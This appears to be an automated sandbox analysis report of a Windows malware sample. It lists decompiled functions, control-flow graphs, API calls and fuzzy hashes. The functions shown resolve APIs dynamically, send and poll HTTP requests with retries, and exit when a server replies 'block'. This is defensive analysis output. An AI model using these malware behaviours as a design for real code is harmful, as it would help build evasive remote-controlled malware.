                            • Instruction Fuzzy Hash: FAD05E7490030CDBCB14DFE4DC496EDBB7CFB08312F000598D90572340EA305482CAAA
                            Function 000F9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 f9c10-f9c1a 634 fa036-fa0ca LoadLibraryA * 8 633->634 635 f9c20-fa031 GetProcAddress * 43 633->635 636 fa0cc-fa141 GetProcAddress * 5 634->636 637 fa146-fa14d 634->637 635->634 636->637 638 fa216-fa21d 637->638 639 fa153-fa211 GetProcAddress * 8 637->639 640 fa21f-fa293 GetProcAddress * 5 638->640 641 fa298-fa29f 638->641 639->638 640->641 642 fa337-fa33e 641->642 643 fa2a5-fa332 GetProcAddress * 6 641->643 644 fa41f-fa426 642->644 645 fa344-fa41a GetProcAddress * 9 642->645 643->642 646 fa428-fa49d GetProcAddress * 5 644->646 647 fa4a2-fa4a9 644->647 645->644 646->647 648 fa4dc-fa4e3 647->648 649 fa4ab-fa4d7 GetProcAddress * 2 647->649 650 fa515-fa51c 648->650 651 fa4e5-fa510 GetProcAddress * 2 648->651 649->648 652 fa612-fa619 650->652 653 fa522-fa60d GetProcAddress * 10 650->653 651->650 654 fa67d-fa684 652->654 655 fa61b-fa678 GetProcAddress * 4 652->655 653->652 656 fa69e-fa6a5 654->656 657 fa686-fa699 GetProcAddress 654->657 655->654 658 fa708-fa709 656->658 659 fa6a7-fa703 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,01215BF0), ref: 000F9C2D
                            • GetProcAddress.KERNEL32(74DD0000,01215CB0), ref: 000F9C45
                            • GetProcAddress.KERNEL32(74DD0000,012296A0), ref: 000F9C5E
                            • GetProcAddress.KERNEL32(74DD0000,012296B8), ref: 000F9C76
                            • GetProcAddress.KERNEL32(74DD0000,012296D0), ref: 000F9C8E
                            • GetProcAddress.KERNEL32(74DD0000,01229610), ref: 000F9CA7
                            • GetProcAddress.KERNEL32(74DD0000,0121BBD0), ref: 000F9CBF
                            • GetProcAddress.KERNEL32(74DD0000,0122CE70), ref: 000F9CD7
                            • GetProcAddress.KERNEL32(74DD0000,0122CF30), ref: 000F9CF0
                            • GetProcAddress.KERNEL32(74DD0000,0122D0B0), ref: 000F9D08
                            • GetProcAddress.KERNEL32(74DD0000,0122CDF8), ref: 000F9D20
                            • GetProcAddress.KERNEL32(74DD0000,01215BB0), ref: 000F9D39
                            • GetProcAddress.KERNEL32(74DD0000,01215CF0), ref: 000F9D51
                            • GetProcAddress.KERNEL32(74DD0000,01215D70), ref: 000F9D69
                            • GetProcAddress.KERNEL32(74DD0000,01215BD0), ref: 000F9D82
                            • GetProcAddress.KERNEL32(74DD0000,0122CF90), ref: 000F9D9A
                            • GetProcAddress.KERNEL32(74DD0000,0122CFC0), ref: 000F9DB2
                            • GetProcAddress.KERNEL32(74DD0000,0121BC70), ref: 000F9DCB
                            • GetProcAddress.KERNEL32(74DD0000,01215D90), ref: 000F9DE3
                            • GetProcAddress.KERNEL32(74DD0000,0122CE10), ref: 000F9DFB
                            • GetProcAddress.KERNEL32(74DD0000,0122CFD8), ref: 000F9E14
                            • GetProcAddress.KERNEL32(74DD0000,0122CED0), ref: 000F9E2C
                            • GetProcAddress.KERNEL32(74DD0000,0122CF78), ref: 000F9E44
                            • GetProcAddress.KERNEL32(74DD0000,01215DB0), ref: 000F9E5D
                            • GetProcAddress.KERNEL32(74DD0000,0122CEB8), ref: 000F9E75
                            • GetProcAddress.KERNEL32(74DD0000,0122CE28), ref: 000F9E8D
                            • GetProcAddress.KERNEL32(74DD0000,0122CF18), ref: 000F9EA6
                            • GetProcAddress.KERNEL32(74DD0000,0122CEE8), ref: 000F9EBE
                            • GetProcAddress.KERNEL32(74DD0000,0122CE88), ref: 000F9ED6
                            • GetProcAddress.KERNEL32(74DD0000,0122D068), ref: 000F9EEF
                            • GetProcAddress.KERNEL32(74DD0000,0122CE40), ref: 000F9F07
                            • GetProcAddress.KERNEL32(74DD0000,0122CFF0), ref: 000F9F1F
                            • GetProcAddress.KERNEL32(74DD0000,0122D008), ref: 000F9F38
                            • GetProcAddress.KERNEL32(74DD0000,0122A6F0), ref: 000F9F50
                            • GetProcAddress.KERNEL32(74DD0000,0122CF48), ref: 000F9F68
                            • GetProcAddress.KERNEL32(74DD0000,0122D038), ref: 000F9F81
                            • GetProcAddress.KERNEL32(74DD0000,01215DD0), ref: 000F9F99
                            • GetProcAddress.KERNEL32(74DD0000,0122CE58), ref: 000F9FB1
                            • GetProcAddress.KERNEL32(74DD0000,01215A50), ref: 000F9FCA
                            • GetProcAddress.KERNEL32(74DD0000,0122D080), ref: 000F9FE2
                            • GetProcAddress.KERNEL32(74DD0000,0122D020), ref: 000F9FFA
                            • GetProcAddress.KERNEL32(74DD0000,012158B0), ref: 000FA013
                            • GetProcAddress.KERNEL32(74DD0000,012157F0), ref: 000FA02B
                            • LoadLibraryA.KERNEL32(0122CF60,?,000F5CA3,00100AEB,?,?,?,?,?,?,?,?,?,?,00100AEA,00100AE3), ref: 000FA03D
                            • LoadLibraryA.KERNEL32(0122D050,?,000F5CA3,00100AEB,?,?,?,?,?,?,?,?,?,?,00100AEA,00100AE3), ref: 000FA04E
                            • LoadLibraryA.KERNEL32(0122CFA8,?,000F5CA3,00100AEB,?,?,?,?,?,?,?,?,?,?,00100AEA,00100AE3), ref: 000FA060
                            • LoadLibraryA.KERNEL32(0122CEA0,?,000F5CA3,00100AEB,?,?,?,?,?,?,?,?,?,?,00100AEA,00100AE3), ref: 000FA072
                            • LoadLibraryA.KERNEL32(0122CF00,?,000F5CA3,00100AEB,?,?,?,?,?,?,?,?,?,?,00100AEA,00100AE3), ref: 000FA083
                            • LoadLibraryA.KERNEL32(0122D0C8,?,000F5CA3,00100AEB,?,?,?,?,?,?,?,?,?,?,00100AEA,00100AE3), ref: 000FA095
                            • LoadLibraryA.KERNEL32(0122D0E0,?,000F5CA3,00100AEB,?,?,?,?,?,?,?,?,?,?,00100AEA,00100AE3), ref: 000FA0A7
                            • LoadLibraryA.KERNEL32(0122D098,?,000F5CA3,00100AEB,?,?,?,?,?,?,?,?,?,?,00100AEA,00100AE3), ref: 000FA0B8
                            • GetProcAddress.KERNEL32(75290000,01215A90), ref: 000FA0DA
                            • GetProcAddress.KERNEL32(75290000,0122D2C0), ref: 000FA0F2
                            • GetProcAddress.KERNEL32(75290000,01228FB8), ref: 000FA10A
                            • GetProcAddress.KERNEL32(75290000,0122D2D8), ref: 000FA123
                            • GetProcAddress.KERNEL32(75290000,01215970), ref: 000FA13B
                            • GetProcAddress.KERNEL32(73B40000,0121B9C8), ref: 000FA160
                            • GetProcAddress.KERNEL32(73B40000,01215A70), ref: 000FA179
                            • GetProcAddress.KERNEL32(73B40000,0121B798), ref: 000FA191
                            • GetProcAddress.KERNEL32(73B40000,0122D260), ref: 000FA1A9
                            • GetProcAddress.KERNEL32(73B40000,0122D320), ref: 000FA1C2
                            • GetProcAddress.KERNEL32(73B40000,01215910), ref: 000FA1DA
                            • GetProcAddress.KERNEL32(73B40000,01215870), ref: 000FA1F2
                            • GetProcAddress.KERNEL32(73B40000,0122D128), ref: 000FA20B
                            • GetProcAddress.KERNEL32(752C0000,012156B0), ref: 000FA22C
                            • GetProcAddress.KERNEL32(752C0000,012158F0), ref: 000FA244
                            • GetProcAddress.KERNEL32(752C0000,0122D3C8), ref: 000FA25D
                            • GetProcAddress.KERNEL32(752C0000,0122D308), ref: 000FA275
                            • GetProcAddress.KERNEL32(752C0000,01215730), ref: 000FA28D
                            • GetProcAddress.KERNEL32(74EC0000,0121B6F8), ref: 000FA2B3
                            • GetProcAddress.KERNEL32(74EC0000,0121B720), ref: 000FA2CB
                            • GetProcAddress.KERNEL32(74EC0000,0122D2F0), ref: 000FA2E3
                            • GetProcAddress.KERNEL32(74EC0000,012156F0), ref: 000FA2FC
                            • GetProcAddress.KERNEL32(74EC0000,01215A10), ref: 000FA314
                            • GetProcAddress.KERNEL32(74EC0000,0121BA18), ref: 000FA32C
                            • GetProcAddress.KERNEL32(75BD0000,0122D1A0), ref: 000FA352
                            • GetProcAddress.KERNEL32(75BD0000,012156D0), ref: 000FA36A
                            • GetProcAddress.KERNEL32(75BD0000,01228FE8), ref: 000FA382
                            • GetProcAddress.KERNEL32(75BD0000,0122D278), ref: 000FA39B
                            • GetProcAddress.KERNEL32(75BD0000,0122D200), ref: 000FA3B3
                            • GetProcAddress.KERNEL32(75BD0000,01215990), ref: 000FA3CB
                            • GetProcAddress.KERNEL32(75BD0000,012159B0), ref: 000FA3E4
                            • GetProcAddress.KERNEL32(75BD0000,0122D110), ref: 000FA3FC
                            • GetProcAddress.KERNEL32(75BD0000,0122D350), ref: 000FA414
                            • GetProcAddress.KERNEL32(75A70000,01215930), ref: 000FA436
                            • GetProcAddress.KERNEL32(75A70000,0122D338), ref: 000FA44E
                            • GetProcAddress.KERNEL32(75A70000,0122D1B8), ref: 000FA466
                            • GetProcAddress.KERNEL32(75A70000,0122D368), ref: 000FA47F
                            • GetProcAddress.KERNEL32(75A70000,0122D290), ref: 000FA497
                            • GetProcAddress.KERNEL32(75450000,01215710), ref: 000FA4B8
                            • GetProcAddress.KERNEL32(75450000,012158D0), ref: 000FA4D1
                            • GetProcAddress.KERNEL32(75DA0000,01215A30), ref: 000FA4F2
                            • GetProcAddress.KERNEL32(75DA0000,0122D248), ref: 000FA50A
                            • GetProcAddress.KERNEL32(6F080000,01215950), ref: 000FA530
                            • GetProcAddress.KERNEL32(6F080000,01215750), ref: 000FA548
                            • GetProcAddress.KERNEL32(6F080000,012157B0), ref: 000FA560
                            • GetProcAddress.KERNEL32(6F080000,0122D398), ref: 000FA579
                            • GetProcAddress.KERNEL32(6F080000,01215770), ref: 000FA591
                            • GetProcAddress.KERNEL32(6F080000,012159D0), ref: 000FA5A9
                            • GetProcAddress.KERNEL32(6F080000,012159F0), ref: 000FA5C2
                            • GetProcAddress.KERNEL32(6F080000,01215790), ref: 000FA5DA
                            • GetProcAddress.KERNEL32(6F080000,InternetSetOptionA), ref: 000FA5F1
                            • GetProcAddress.KERNEL32(6F080000,HttpQueryInfoA), ref: 000FA607
                            • GetProcAddress.KERNEL32(75AF0000,0122D380), ref: 000FA629
                            • GetProcAddress.KERNEL32(75AF0000,01229018), ref: 000FA641
                            • GetProcAddress.KERNEL32(75AF0000,0122D3B0), ref: 000FA659
                            • GetProcAddress.KERNEL32(75AF0000,0122D3E0), ref: 000FA672
                            • GetProcAddress.KERNEL32(75D90000,01215830), ref: 000FA693
                            • GetProcAddress.KERNEL32(6E330000,0122D0F8), ref: 000FA6B4
                            • GetProcAddress.KERNEL32(6E330000,012157D0), ref: 000FA6CD
                            • GetProcAddress.KERNEL32(6E330000,0122D2A8), ref: 000FA6E5
                            • GetProcAddress.KERNEL32(6E330000,0122D140), ref: 000FA6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 3dfc5a035176adba180e58b32cd4094922b8b5c626897df1979dad3210bfcee2
                            • Instruction ID: cd24bcd8a887bb8d33a671890c258fb6810f5136b30a80bc87fd4c438dc9d488
                            • Opcode Fuzzy Hash: 3dfc5a035176adba180e58b32cd4094922b8b5c626897df1979dad3210bfcee2
                            • Instruction Fuzzy Hash: 9D620DB5500A00AFC366DFA9EE889663BFDF74C701F14852EE609C3264D739A443DB5A
                            Function 000E6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 e6280-e630b call fa7a0 call e47b0 call fa740 InternetOpenA StrCmpCA 1040 e630d 1033->1040 1041 e6314-e6318 1033->1041 1040->1041 1042 e631e-e6342 InternetConnectA 1041->1042 1043 e6509-e6525 call fa7a0 call fa800 * 2 1041->1043 1044 e64ff-e6503 InternetCloseHandle 1042->1044 1045 e6348-e634c 1042->1045 1063 e6528-e652d 1043->1063 1044->1043 1047 e634e-e6358 1045->1047 1048 e635a 1045->1048 1050 e6364-e6392 HttpOpenRequestA 1047->1050 1048->1050 1052 e6398-e639c 1050->1052 1053 e64f5-e64f9 InternetCloseHandle 1050->1053 1055 e639e-e63bf InternetSetOptionA 1052->1055 1056 e63c5-e6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 e642c-e644b call f8940 1056->1058 1059 e6407-e6427 call fa740 call fa800 * 2 1056->1059 1066 e644d-e6454 1058->1066 1067 e64c9-e64e9 call fa740 call fa800 * 2 1058->1067 1059->1063 1069 e6456-e6480 InternetReadFile 1066->1069 1070 e64c7-e64ef InternetCloseHandle 1066->1070 1067->1063 1074 e648b 1069->1074 1075 e6482-e6489 1069->1075 1070->1053 1074->1070 1075->1074 1079 e648d-e64c5 call fa9b0 call fa8a0 call fa800 1075->1079 1079->1069
                            APIs
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000E4839
                              • Part of subcall function 000E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000E4849
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • InternetOpenA.WININET(00100DFE,00000001,00000000,00000000,00000000), ref: 000E62E1
                            • StrCmpCA.SHLWAPI(?,0122E878), ref: 000E6303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000E6335
                            • HttpOpenRequestA.WININET(00000000,GET,?,0122E458,00000000,00000000,00400100,00000000), ref: 000E6385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000E63BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000E63D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000E63FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000E646D
                            • InternetCloseHandle.WININET(00000000), ref: 000E64EF
                            • InternetCloseHandle.WININET(00000000), ref: 000E64F9
                            • InternetCloseHandle.WININET(00000000), ref: 000E6503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: 547c8e9730b89ad8175085b1cc8be4404d04ba6cb4dc9fd21be4c7bc6aaf3b11
                            • Instruction ID: 89ac66dbe03b21ea6de87ea51d6badaf326d89e93b208321f209ec4a6f428844
                            • Opcode Fuzzy Hash: 547c8e9730b89ad8175085b1cc8be4404d04ba6cb4dc9fd21be4c7bc6aaf3b11
                            • Instruction Fuzzy Hash: EF715EB1A00258EFDB24DBA0DC49FEE77B8BB44700F108158F60A6B5D1DBB56A86CF51
                            Function 000F5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 f5510-f5577 call f5ad0 call fa820 * 3 call fa740 * 4 1106 f557c-f5583 1090->1106 1107 f55d7-f564c call fa740 * 2 call e1590 call f52c0 call fa8a0 call fa800 call faad0 StrCmpCA 1106->1107 1108 f5585-f55b6 call fa820 call fa7a0 call e1590 call f51f0 1106->1108 1133 f5693-f56a9 call faad0 StrCmpCA 1107->1133 1138 f564e-f568e call fa7a0 call e1590 call f51f0 call fa8a0 call fa800 1107->1138 1124 f55bb-f55d2 call fa8a0 call fa800 1108->1124 1124->1133 1140 f56af-f56b6 1133->1140 1141 f57dc-f5844 call fa8a0 call fa820 * 2 call e1670 call fa800 * 4 call f6560 call e1550 1133->1141 1138->1133 1144 f56bc-f56c3 1140->1144 1145 f57da-f585f call faad0 StrCmpCA 1140->1145 1270 f5ac3-f5ac6 1141->1270 1149 f571e-f5793 call fa740 * 2 call e1590 call f52c0 call fa8a0 call fa800 call faad0 StrCmpCA 1144->1149 1150 f56c5-f5719 call fa820 call fa7a0 call e1590 call f51f0 call fa8a0 call fa800 1144->1150 1164 f5865-f586c 1145->1164 1165 f5991-f59f9 call fa8a0 call fa820 * 2 call e1670 call fa800 * 4 call f6560 call e1550 1145->1165 1149->1145 1250 f5795-f57d5 call fa7a0 call e1590 call f51f0 call fa8a0 call fa800 1149->1250 1150->1145 1171 f598f-f5a14 call faad0 StrCmpCA 1164->1171 1172 f5872-f5879 1164->1172 1165->1270 1201 f5a28-f5a91 call fa8a0 call fa820 * 2 call e1670 call fa800 * 4 call f6560 call e1550 1171->1201 1202 f5a16-f5a21 Sleep 1171->1202 1180 f587b-f58ce call fa820 call fa7a0 call e1590 call f51f0 call fa8a0 call fa800 1172->1180 1181 f58d3-f5948 call fa740 * 2 call e1590 call f52c0 call fa8a0 call fa800 call faad0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 f594a-f598a call fa7a0 call e1590 call f51f0 call fa8a0 call fa800 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                            APIs
                              • Part of subcall function 000FA820: lstrlen.KERNEL32(000E4F05,?,?,000E4F05,00100DDE), ref: 000FA82B
                              • Part of subcall function 000FA820: lstrcpy.KERNEL32(00100DDE,00000000), ref: 000FA885
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000F5644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000F56A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000F5857
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000F51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000F5228
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000F52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000F5318
                              • Part of subcall function 000F52C0: lstrlen.KERNEL32(00000000), ref: 000F532F
                              • Part of subcall function 000F52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 000F5364
                              • Part of subcall function 000F52C0: lstrlen.KERNEL32(00000000), ref: 000F5383
                              • Part of subcall function 000F52C0: lstrlen.KERNEL32(00000000), ref: 000F53AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000F578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000F5940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000F5A0C
                            • Sleep.KERNEL32(0000EA60), ref: 000F5A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 7621f2aa9c37234910c4804ff26bcd4156fc7f6a262657eb697674f27c96c7aa
                            • Instruction ID: e88b16cf17dfe0b58a53a56628e1a7855489193125b5f665e62af0c3af980f6a
                            • Opcode Fuzzy Hash: 7621f2aa9c37234910c4804ff26bcd4156fc7f6a262657eb697674f27c96c7aa
                            • Instruction Fuzzy Hash: E8E156B1A1060C9BCB14FBA0DC56EFD737CAF55340F508118B60A66897EF746A0EDB92
                            Function 000F17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 f17a0-f17cd call faad0 StrCmpCA 1304 f17cf-f17d1 ExitProcess 1301->1304 1305 f17d7-f17f1 call faad0 1301->1305 1309 f17f4-f17f8 1305->1309 1310 f17fe-f1811 1309->1310 1311 f19c2-f19cd call fa800 1309->1311 1313 f199e-f19bd 1310->1313 1314 f1817-f181a 1310->1314 1313->1309 1316 f18cf-f18e0 StrCmpCA 1314->1316 1317 f198f-f1999 call fa820 1314->1317 1318 f18ad-f18be StrCmpCA 1314->1318 1319 f1849-f1858 call fa820 1314->1319 1320 f1821-f1830 call fa820 1314->1320 1321 f187f-f1890 StrCmpCA 1314->1321 1322 f185d-f186e StrCmpCA 1314->1322 1323 f1835-f1844 call fa820 1314->1323 1324 f1913-f1924 StrCmpCA 1314->1324 1325 f1932-f1943 StrCmpCA 1314->1325 1326 f18f1-f1902 StrCmpCA 1314->1326 1327 f1951-f1962 StrCmpCA 1314->1327 1328 f1970-f1981 StrCmpCA 1314->1328 1350 f18ec 1316->1350 1351 f18e2-f18e5 1316->1351 1317->1313 1348 f18ca 1318->1348 1349 f18c0-f18c3 1318->1349 1319->1313 1320->1313 1346 f189e-f18a1 1321->1346 1347 f1892-f189c 1321->1347 1344 f187a 1322->1344 1345 f1870-f1873 1322->1345 1323->1313 1331 f1926-f1929 1324->1331 1332 f1930 1324->1332 1333 f194f 1325->1333 1334 f1945-f1948 1325->1334 1329 f190e 1326->1329 1330 f1904-f1907 1326->1330 1335 f196e 1327->1335 1336 f1964-f1967 1327->1336 1338 f198d 1328->1338 1339 f1983-f1986 1328->1339 1329->1313 1330->1329 1331->1332 1332->1313 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 f18a8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 000F17C5
                            • ExitProcess.KERNEL32 ref: 000F17D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: d29cf70b5070c9723d02c1ea7c86b3e0d061073cd7b20700adda20c57929496c
                            • Instruction ID: 0d008121be2cf07fc2aacc19304803f0d88b7b5cb3917eb80a729284693f6a0b
                            • Opcode Fuzzy Hash: d29cf70b5070c9723d02c1ea7c86b3e0d061073cd7b20700adda20c57929496c
                            • Instruction Fuzzy Hash: 22514DB4A0820DEBCB15DFA0D994BFE77B5BF44704F10404CE605A7640D7B0E952EBA2
                            Function 000F7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
